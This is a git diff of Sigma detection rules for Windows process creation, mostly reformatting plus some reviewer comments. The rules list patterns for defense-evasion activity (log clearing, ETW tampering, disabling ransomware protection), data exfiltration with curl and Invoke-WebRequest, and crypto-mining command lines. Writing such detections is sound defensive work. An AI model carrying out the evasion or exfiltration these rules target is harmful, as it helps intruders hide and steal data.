@@ -1,14 +1,11 @@ title: LOL-Binary Copied From System Directory id: f5d19838-41b5-476c-98d8-ba8af4929ee2 related: - - id: fff9d2b7-e11c-4a69-93d3-40ef66189767 - type: derived + - id: fff9d2b7-e11c-4a69-93d3-40ef66189767 + type: derived status: experimental -description: 'Detects a suspicious copy operation that tries to copy a known LOLBIN - from system (System32, SysWOW64, WinSxS) directories to another on disk in order - to bypass detections based on locations. - - ' +description: | + Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations. references: - https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120 - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html @@ -26,31 +23,32 @@ detection: EventID: 4688 Channel: Security selection_tools_cmd: - CommandLine|contains: 'copy ' - NewProcessName|endswith: \cmd.exe + CommandLine|contains: 'copy ' + NewProcessName|endswith: \cmd.exe selection_tools_pwsh: - CommandLine|contains: + CommandLine|contains: - copy-item - ' copy ' - 'cpi ' - ' cp ' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe selection_tools_other: - - NewProcessName|endswith: - - \robocopy.exe - - \xcopy.exe - - OriginalFileName: - - robocopy.exe - - XCOPY.EXE + - NewProcessName|endswith: + - \robocopy.exe + - \xcopy.exe + - OriginalFileName: + - robocopy.exe + - XCOPY.EXE selection_target_path: - CommandLine|contains: + CommandLine|contains: - \System32 - \SysWOW64 - \WinSxS selection_target_lolbin: - CommandLine|contains: + CommandLine|contains: + # Note: add more binaries to increase coverage - \bitsadmin.exe - \calc.exe - \certutil.exe 
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_crypto_mining_monero.yml b/sigma/builtin/process_creation/proc_creation_win_susp_crypto_mining_monero.yml index 738a5aaf5..774b39a5d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_crypto_mining_monero.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_crypto_mining_monero.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' --cpu-priority=' - --donate-level=0 - ' -o pool.' @@ -26,9 +26,11 @@ detection: - ' --algo=rx/0 ' - stratum+tcp:// - stratum+udp:// + # base64 encoded: --donate-level= - LS1kb25hdGUtbGV2ZWw9 - 0tZG9uYXRlLWxldmVsP - tLWRvbmF0ZS1sZXZlbD + # base64 encoded: stratum+tcp:// and stratum+udp:// - c3RyYXR1bSt0Y3A6Ly - N0cmF0dW0rdGNwOi8v - zdHJhdHVtK3RjcDovL @@ -36,7 +38,7 @@ detection: - N0cmF0dW0rdWRwOi8v - zdHJhdHVtK3VkcDovL filter: - CommandLine|contains: + CommandLine|contains: - ' pool.c ' - ' pool.o ' - gcc - diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml b/sigma/builtin/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml index 5d6a0e730..74e7e34ce 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml 
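Review bot: The two comments added to `selection` in the second hunk of this file name the plaintext but not why each keyword appears three times, so a later maintainer may prune the `0tZG9u…` / `tLWRvb…` entries as near-duplicates. The three strings per keyword are the base64 encodings at the three possible byte offsets, which is what makes the match independent of where the keyword sits in the encoded command line. Suggest `# base64 encoded: --donate-level= (all three byte-alignment offsets)` and the same wording for the stratum comment.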
@@ -18,54 +18,53 @@ detection: EventID: 4688 Channel: Security selection_iwr: - CommandLine|contains: + CommandLine|contains: - Invoke-WebRequest - 'iwr ' - 'wget ' - 'curl ' - CommandLine|contains|all: - - ' -ur' - - ' -me' + CommandLine|contains|all: + - ' -ur' # Shortest possible version of the -uri flag + - ' -me' # Shortest possible version of the -method flag - ' -b' - ' POST ' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe - \cmd.exe selection_curl: - CommandLine|contains: --ur - NewProcessName|endswith: \curl.exe + CommandLine|contains: --ur # Shortest possible version of the --uri flag + NewProcessName|endswith: \curl.exe selection_curl_data: - CommandLine|contains: - - ' -d ' + CommandLine|contains: + - ' -d ' # Shortest possible version of the --data flag - ' --data ' selection_wget: - CommandLine|contains: + CommandLine|contains: - --post-data - --post-file - NewProcessName|endswith: \wget.exe + NewProcessName|endswith: \wget.exe payloads: - - CommandLine|contains: - - Get-Content - - GetBytes - - hostname - - ifconfig - - ipconfig - - net view - - netstat - - nltest - - qprocess - - sc query - - systeminfo - - tasklist - - ToBase64String - - whoami - - CommandLine|contains|all: - - 'type ' - - ' > ' - - ' C:\' - condition: process_creation and ((selection_iwr or all of selection_curl* or selection_wget) - and payloads) + - CommandLine|contains: + - Get-Content + - GetBytes + - hostname + - ifconfig + - ipconfig + - net view + - netstat + - nltest + - qprocess + - sc query + - systeminfo + - tasklist + - ToBase64String + - whoami + - CommandLine|contains|all: + - 'type ' + - ' > ' + - ' C:\' + condition: process_creation and ((selection_iwr or all of selection_curl* or selection_wget) and payloads) falsepositives: - Unlikely level: high 
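Review bot: The comment added to `selection_curl`, `CommandLine|contains: --ur # Shortest possible version of the --uri flag`, names an option curl does not have; curl's long form is `--url`, and `--ur` is the prefix that still matches it. Suggest `CommandLine|contains: --ur # Shortest possible prefix of curl's --url flag`. The `-ur` / `-me` comments in `selection_iwr` are consistent with Invoke-WebRequest, whose `-Uri` and `-Method` parameters accept unambiguous prefixes.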
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_disable_raccine.yml b/sigma/builtin/process_creation/proc_creation_win_susp_disable_raccine.yml index a2d5bb44f..cb1aee3ed 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_disable_raccine.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_disable_raccine.yml @@ -1,8 +1,7 @@ title: Raccine Uninstall id: a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc status: test -description: Detects commands that indicate a Raccine removal from an end system. - Raccine is a free ransomware protection tool. +description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool. references: - https://github.com/Neo23x0/Raccine author: Florian Roth (Nextron Systems) @@ -19,16 +18,16 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains|all: + CommandLine|contains|all: - 'taskkill ' - RaccineSettings.exe selection2: - CommandLine|contains|all: + CommandLine|contains|all: - reg.exe - delete - Raccine Tray selection3: - CommandLine|contains|all: + CommandLine|contains|all: - schtasks - /DELETE - Raccine Rules Updater diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_double_extension.yml b/sigma/builtin/process_creation/proc_creation_win_susp_double_extension.yml index 3d6725091..a4838db0e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_double_extension.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_double_extension.yml 
@@ -1,17 +1,14 @@ title: Suspicious Double Extension File Execution id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 related: - - id: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c - type: similar + - id: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c # ParentImage/ParentCommandLine + type: similar status: stable -description: Detects suspicious use of an .exe extension after a non-executable file - extension like .pdf.exe, a set of spaces or underlines to cloak the executable - file in spear phishing campaigns +description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns references: - https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html - https://twitter.com/blackorbird/status/1140519090961825792 -author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali - (Nextron Systems) +author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) date: 2019/06/26 modified: 2023/02/28 tags: @@ -25,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - .doc.exe - .docx.exe - .xls.exe @@ -46,7 +43,7 @@ detection: - .rtf.js - .pdf.js - .txt.js - NewProcessName|endswith: + NewProcessName|endswith: - .doc.exe - .docx.exe - .xls.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_double_extension_parent.yml b/sigma/builtin/process_creation/proc_creation_win_susp_double_extension_parent.yml index 0c2a34a01..32b78b87c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_double_extension_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_double_extension_parent.yml 
@@ -1,8 +1,8 @@ title: Suspicious Parent Double Extension File Execution id: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c related: - - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 - type: derived + - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 # Image/CommandLine + type: derived status: test description: Detect execution of suspicious double extension files in ParentCommandLine references: @@ -22,44 +22,44 @@ detection: EventID: 4688 Channel: Security selection: - - ParentProcessName|endswith: - - .doc.lnk - - .docx.lnk - - .xls.lnk - - .xlsx.lnk - - .ppt.lnk - - .pptx.lnk - - .rtf.lnk - - .pdf.lnk - - .txt.lnk - - .doc.js - - .docx.js - - .xls.js - - .xlsx.js - - .ppt.js - - .pptx.js - - .rtf.js - - .pdf.js - - .txt.js - - ParentCommandLine|contains: - - .doc.lnk - - .docx.lnk - - .xls.lnk - - .xlsx.lnk - - .ppt.lnk - - .pptx.lnk - - .rtf.lnk - - .pdf.lnk - - .txt.lnk - - .doc.js - - .docx.js - - .xls.js - - .xlsx.js - - .ppt.js - - .pptx.js - - .rtf.js - - .pdf.js - - .txt.js + - ParentProcessName|endswith: + - .doc.lnk + - .docx.lnk + - .xls.lnk + - .xlsx.lnk + - .ppt.lnk + - .pptx.lnk + - .rtf.lnk + - .pdf.lnk + - .txt.lnk + - .doc.js + - .docx.js + - .xls.js + - .xlsx.js + - .ppt.js + - .pptx.js + - .rtf.js + - .pdf.js + - .txt.js + - ParentCommandLine|contains: + - .doc.lnk + - .docx.lnk + - .xls.lnk + - .xlsx.lnk + - .ppt.lnk + - .pptx.lnk + - .rtf.lnk + - .pdf.lnk + - .txt.lnk + - .doc.js + - .docx.js + - .xls.js + - .xlsx.js + - .ppt.js + - .pptx.js + - .rtf.js + - .pdf.js + - .txt.js condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_download_office_domain.yml b/sigma/builtin/process_creation/proc_creation_win_susp_download_office_domain.yml index c5628a692..0eff7e829 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_download_office_domain.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_download_office_domain.yml 
@@ -1,8 +1,7 @@ title: Suspicious Download from Office Domain id: 00d49ed5-4491-4271-a8db-650a4ef6f8c1 status: test -description: Detects suspicious ways to download files from Microsoft domains that - are used to store attachments in Emails or OneNote documents +description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents references: - https://twitter.com/an0n_r0/status/1474698356635193346?s=12 - https://twitter.com/mrd0x/status/1475085452784844803?s=12 @@ -21,24 +20,23 @@ detection: EventID: 4688 Channel: Security selection_download: - - NewProcessName|endswith: - - \curl.exe - - \wget.exe - - CommandLine|contains: - - Invoke-WebRequest - - 'iwr ' - - 'curl ' - - 'wget ' - - Start-BitsTransfer - - .DownloadFile( - - .DownloadString( + - NewProcessName|endswith: + - \curl.exe + - \wget.exe + - CommandLine|contains: + - Invoke-WebRequest + - 'iwr ' + - 'curl ' + - 'wget ' + - Start-BitsTransfer + - .DownloadFile( + - .DownloadString( selection_domains: - CommandLine|contains: + CommandLine|contains: - https://attachment.outlook.live.net/owa/ - https://onenoteonlinesync.onenote.com/onenoteonlinesync/ condition: process_creation and (all of selection_*) falsepositives: - - Scripts or tools that download attachments from these domains (OneNote, Outlook - 365) + - Scripts or tools that download attachments from these domains (OneNote, Outlook 365) level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml b/sigma/builtin/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml index 607c1d5ef..dfbfad02d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml 
@@ -17,9 +17,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \DumpStack.log + NewProcessName|endswith: \DumpStack.log selection_download: - CommandLine|contains: ' -o DumpStack.log' + CommandLine|contains: ' -o DumpStack.log' condition: process_creation and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml b/sigma/builtin/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml index 3b6923d16..6af907243 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml @@ -18,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE + - pwsh.dll selection_parent: ParentProcessName|contains|all: - \Windows\Installer\ diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_electron_app_children.yml b/sigma/builtin/process_creation/proc_creation_win_susp_electron_app_children.yml index 7126f6fcd..1268a9c52 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_electron_app_children.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_electron_app_children.yml 
@@ -1,15 +1,11 @@ title: Suspicious Electron Application Child Processes id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8 related: - - id: 378a05d8-963c-46c9-bcce-13c7657eac99 - type: similar + - id: 378a05d8-963c-46c9-bcce-13c7657eac99 + type: similar status: experimental -description: 'Detects suspicious child processes of electron apps (teams, discord, - slack, etc.). This could be a potential sign of ".asar" file tampering (See reference - section for more information) or binary execution proxy through specific CLI arguments - (see related rule) - - ' +description: | + Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule) references: - https://taggart-tech.com/quasar-electron/ - https://github.com/mttaggart/quasar @@ -32,7 +28,9 @@ detection: Channel: Security selection_parent: ParentProcessName|endswith: - - \chrome.exe + # Add more electron based app to the list + - \chrome.exe # Might require additional tuning + # - '\code.exe' # Requires additional baseline - \discord.exe - \GitHubDesktop.exe - \keybase.exe @@ -42,7 +40,8 @@ detection: - \slack.exe - \Teams.exe selection_child_image: - NewProcessName|endswith: + NewProcessName|endswith: + # Add more suspicious/unexpected paths - \cmd.exe - \cscript.exe - \mshta.exe 
@@ -51,48 +50,49 @@ detection: - \regsvr32.exe - \wscript.exe selection_child_paths: - NewProcessName|contains: + NewProcessName|contains: + # Add more suspicious/unexpected paths - \AppData\Local\Temp\ - \Users\Public\ - \Windows\Temp\ - :\Temp\ filter_main_chrome: ParentProcessName|endswith: \chrome.exe - NewProcessName|endswith: \chrome.exe + NewProcessName|endswith: \chrome.exe filter_main_discord: ParentProcessName|endswith: \discord.exe - NewProcessName|endswith: \discord.exe + NewProcessName|endswith: \discord.exe filter_main_githubdesktop: ParentProcessName|endswith: \GitHubDesktop.exe - NewProcessName|endswith: \GitHubDesktop.exe + NewProcessName|endswith: \GitHubDesktop.exe filter_main_keybase: ParentProcessName|endswith: \keybase.exe - NewProcessName|endswith: \keybase.exe + NewProcessName|endswith: \keybase.exe filter_main_msedge: ParentProcessName|endswith: \msedge.exe - NewProcessName|endswith: \msedge.exe + NewProcessName|endswith: \msedge.exe filter_main_msedgewebview: ParentProcessName|endswith: \msedgewebview2.exe - NewProcessName|endswith: \msedgewebview2.exe + NewProcessName|endswith: \msedgewebview2.exe filter_main_msteams: ParentProcessName|endswith: \msteams.exe - NewProcessName|endswith: \msteams.exe + NewProcessName|endswith: \msteams.exe filter_main_slack: ParentProcessName|endswith: \slack.exe - NewProcessName|endswith: \slack.exe + NewProcessName|endswith: \slack.exe filter_main_teams: ParentProcessName|endswith: \teams.exe - NewProcessName|endswith: \teams.exe + NewProcessName|endswith: \teams.exe filter_main_werfault: - NewProcessName: + NewProcessName: - C:\Windows\SysWOW64\WerFault.exe - C:\Windows\System32\WerFault.exe filter_optional_discord: - CommandLine|contains: \NVSMI\nvidia-smi.exe + CommandLine|contains: \NVSMI\nvidia-smi.exe ParentProcessName|endswith: \Discord.exe - condition: process_creation and (selection_parent and 1 of selection_child_* and - not 1 of filter_main_* and not 1 of filter_optional_*) + condition: 
process_creation and (selection_parent and 1 of selection_child_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate child processes can occur in cases of debugging +# Increase the level once FP rate is known better (see status) level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml b/sigma/builtin/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml index d1921ba44..465c1b6ac 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml @@ -1,12 +1,10 @@ title: Potentially Suspicious Electron Application CommandLine id: 378a05d8-963c-46c9-bcce-13c7657eac99 related: - - id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8 - type: similar + - id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8 + type: similar status: experimental -description: Detects potentially suspicious CommandLine of electron apps (teams, discord, - slack, etc.). This could be a sign of abuse to proxy execution through a signed - binary. +description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary. references: - https://positive.security/blog/ms-officecmd-rce - https://lolbas-project.github.io/lolbas/Binaries/Teams/ 
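Review bot: `filter_main_werfault` is the only filter in this hunk that pins full paths (`C:\Windows\SysWOW64\WerFault.exe`, `C:\Windows\System32\WerFault.exe`) while every other `filter_main_*` entry uses `|endswith`; on a host whose system drive is not `C:` the WerFault child is not filtered and the rule fires on every crash-reporter launch under an Electron parent. Suggest `NewProcessName|endswith:` with `- \SysWOW64\WerFault.exe` and `- \System32\WerFault.exe`, which keeps the directory constraint without the drive letter. The commit only re-indents this block, so the inconsistency predates it.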
@@ -27,32 +25,34 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \chrome.exe - - \code.exe - - \discord.exe - - \GitHubDesktop.exe - - \keybase.exe - - \msedge_proxy.exe - - \msedge.exe - - \msedgewebview2.exe - - \msteams.exe - - \slack.exe - - \Teams.exe - - OriginalFileName: - - chrome.exe - - code.exe - - discord.exe - - GitHubDesktop.exe - - keybase.exe - - msedge_proxy.exe - - msedge.exe - - msedgewebview2.exe - - msteams.exe - - slack.exe - - Teams.exe + - NewProcessName|endswith: + # Add more electron based app to the list + - \chrome.exe + - \code.exe + - \discord.exe + - \GitHubDesktop.exe + - \keybase.exe + - \msedge_proxy.exe + - \msedge.exe + - \msedgewebview2.exe + - \msteams.exe + - \slack.exe + - \Teams.exe + - OriginalFileName: + # Add more electron based app to the list + - chrome.exe + - code.exe + - discord.exe + - GitHubDesktop.exe + - keybase.exe + - msedge_proxy.exe + - msedge.exe + - msedgewebview2.exe + - msteams.exe + - slack.exe + - Teams.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - --browser-subprocess-path - --gpu-launcher - --renderer-cmd-prefix @@ -60,5 +60,6 @@ detection: condition: process_creation and (all of selection_*) falsepositives: - Legitimate usage for debugging purposes +# Increase the level once FP rate is known better (see status) level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml b/sigma/builtin/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml index d570a5b86..c3e51d27f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml 
@@ -1,11 +1,10 @@ title: Elevated System Shell Spawned From Uncommon Parent Location id: 178e615d-e666-498b-9630-9ed363038101 related: - - id: 61065c72-5d7d-44ef-bf41-6a36684b545f - type: similar + - id: 61065c72-5d7d-44ef-bf41-6a36684b545f + type: similar status: experimental -description: Detects when a shell program such as the Windows command prompt or PowerShell - is launched with system privileges from a uncommon parent location. +description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location. references: - https://github.com/Wh04m1001/SysmonEoP author: frack113, Tim Shelton (update fp) 
@@ -24,43 +23,50 @@ detection: EventID: 4688 Channel: Security selection_shell: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - \cmd.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Cmd.Exe + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - \cmd.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Cmd.Exe selection_user: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI SubjectLogonId: '0x3e7' filter_main_generic: + # Example 1: + # C:\Program Files\erl-23.2\erts-11.1.4\bin\erl.exe" -service_event ErlSrv_RabbitMQ -nohup -sname rabbit@localhost -s rabbit boot -boot start_sasl +W w +MBas ageffcbf +MHas ageffcbf +MBlmbcs 512 +MHlmbcs 512 +MMmcs 30 +P 1048576 +t 5000000 +stbt db +zdbbl 128000 +sbwt none +sbwtdcpu none +sbwtdio none -kernel inet_dist_listen_min 25672 -kernel inet_dist_listen_max 25672 -lager crash_log false -lager handlers [] + # Example 2: + # ParentImage: C:\Program Files (x86)\Varonis\DatAdvantage\GridCollector\VrnsRealTimeAlertsSvc.exe" /appid 000000ad-cb03-500b-9459-c46d000000ad + # CommandLine: C:\Windows\system32\cmd.exe /c C:\Program Files "(x86)\Varonis\DatAdvantage\GridCollector\handle_scopes.cmd C:\Collector" Working Share\VaronisWorkDirectoryCollector ParentProcessName|contains: - :\Program Files (x86)\ - :\Program Files\ - :\ProgramData\ - :\Windows\System32\ - :\Windows\SysWOW64\ - - :\Windows\Temp\ + - :\Windows\Temp\ # Installers - :\Windows\WinSxS\ filter_optional_manageengine: + # Example: + # ParentImage: C:/ManageEngine/ADManager Plus/pgsql/bin/postgres.exe" --forkarch 5380 + # CommandLine: C:\Windows\system32\cmd.exe /c "IF EXIST archive.bat (archive.bat pg_wal\000000010000008E000000EA 000000010000008E000000EA) ParentProcessName|endswith: :\ManageEngine\ADManager Plus\pgsql\bin\postgres.exe - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe filter_optional_asgard: - CommandLine|contains: 
:\WINDOWS\system32\cmd.exe /c " + CommandLine|contains: :\WINDOWS\system32\cmd.exe /c " CurrentDirectory|contains: :\WINDOWS\Temp\asgard2-agent\ filter_optional_ibm_spectrumprotect: - CommandLine|contains: :\IBM\SpectrumProtect\webserver\scripts\ + CommandLine|contains: :\IBM\SpectrumProtect\webserver\scripts\ ParentProcessName|contains: :\IBM\SpectrumProtect\webserver\scripts\ filter_main_parent_null: - ParentProcessName: null + ParentProcessName: filter_main_parent_empty: ParentProcessName: '' - condition: process_creation and (all of selection_* and not 1 of filter_main_* - and not 1 of filter_optional_*) + condition: process_creation and (all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_embed_exe_lnk.yml b/sigma/builtin/process_creation/proc_creation_win_susp_embed_exe_lnk.yml index f6778aebc..c6323eec1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_embed_exe_lnk.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_embed_exe_lnk.yml @@ -1,8 +1,7 @@ title: Hidden Powershell in Link File Pattern id: 30e92f50-bb5a-4884-98b5-d20aa80f3d7a status: test -description: Detects events that appear when a user click on a link file with a powershell - command in it +description: Detects events that appear when a user click on a link file with a powershell command in it references: - https://www.x86matthew.com/view_post?id=embed_exe_lnk author: frack113 @@ -18,11 +17,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - powershell - .lnk ParentProcessName: C:\Windows\explorer.exe - NewProcessName: C:\Windows\System32\cmd.exe + NewProcessName: C:\Windows\System32\cmd.exe condition: process_creation and selection falsepositives: - Legitimate commands in .lnk files 
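Review bot: `filter_main_parent_null` changes from `ParentProcessName: null` to a bare `ParentProcessName:`; both parse to YAML null, so the Sigma null check is preserved, but the bare key reads like an unfinished line and is easy to mistake for a missing value during the next regeneration. Suggest keeping the explicit form `ParentProcessName: null`, or at least a trailing comment `ParentProcessName:  # null check (no parent recorded)` so the intent is visible.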
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml b/sigma/builtin/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml index 6642db7b6..d6b4a9c93 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml @@ -1,9 +1,7 @@ title: ETW Logging Tamper In .NET Processes id: 41421f44-58f9-455d-838a-c398859841d4 status: test -description: Detects changes to environment variables related to ETW logging. This - could indicate potential adversaries stopping ETW providers recording loaded .NET - assemblies. +description: Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies. references: - https://twitter.com/_xpn_/status/1268712093928378368 - https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr @@ -29,7 +27,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - COMPlus_ETWEnabled - COMPlus_ETWFlags condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_etw_trace_evasion.yml b/sigma/builtin/process_creation/proc_creation_win_susp_etw_trace_evasion.yml index fbdb47642..25037df22 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_etw_trace_evasion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_etw_trace_evasion.yml 
@@ -1,8 +1,7 @@ title: Disable of ETW Trace id: a238b5d0-ce2d-4414-a676-7a531b3d13d6 status: test -description: Detects a command that clears or disables any ETW trace log which could - indicate a logging evasion. +description: Detects a command that clears or disables any ETW trace log which could indicate a logging evasion. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil - https://abuse.io/lockergoga.txt @@ -23,32 +22,32 @@ detection: EventID: 4688 Channel: Security selection_clear_1: - CommandLine|contains|all: + CommandLine|contains|all: - cl - /Trace selection_clear_2: - CommandLine|contains|all: + CommandLine|contains|all: - clear-log - /Trace selection_disable_1: - CommandLine|contains|all: + CommandLine|contains|all: - sl - /e:false selection_disable_2: - CommandLine|contains|all: + CommandLine|contains|all: - set-log - /e:false - selection_disable_3: - CommandLine|contains|all: + selection_disable_3: # ETW provider removal from a trace session + CommandLine|contains|all: - logman - update - trace - --p - -ets - selection_pwsh_remove: - CommandLine|contains: Remove-EtwTraceProvider - selection_pwsh_set: - CommandLine|contains|all: + selection_pwsh_remove: # Autologger provider removal + CommandLine|contains: Remove-EtwTraceProvider + selection_pwsh_set: # Provider “Enable” property modification + CommandLine|contains|all: - Set-EtwTraceProvider - '0x11' condition: process_creation and (1 of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_clear.yml b/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_clear.yml index 17141ed2b..3e3727790 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_clear.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_clear.yml 
@@ -1,9 +1,7 @@ title: Suspicious Eventlog Clear or Configuration Change id: cc36992a-4671-4f21-a91d-6c2b72a2edf5 status: stable -description: Detects clearing or configuration of eventlogs using wevtutil, powershell - and wmic. Might be used by ransomwares during the attack (seen by NotPetya and - others). +description: Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html 
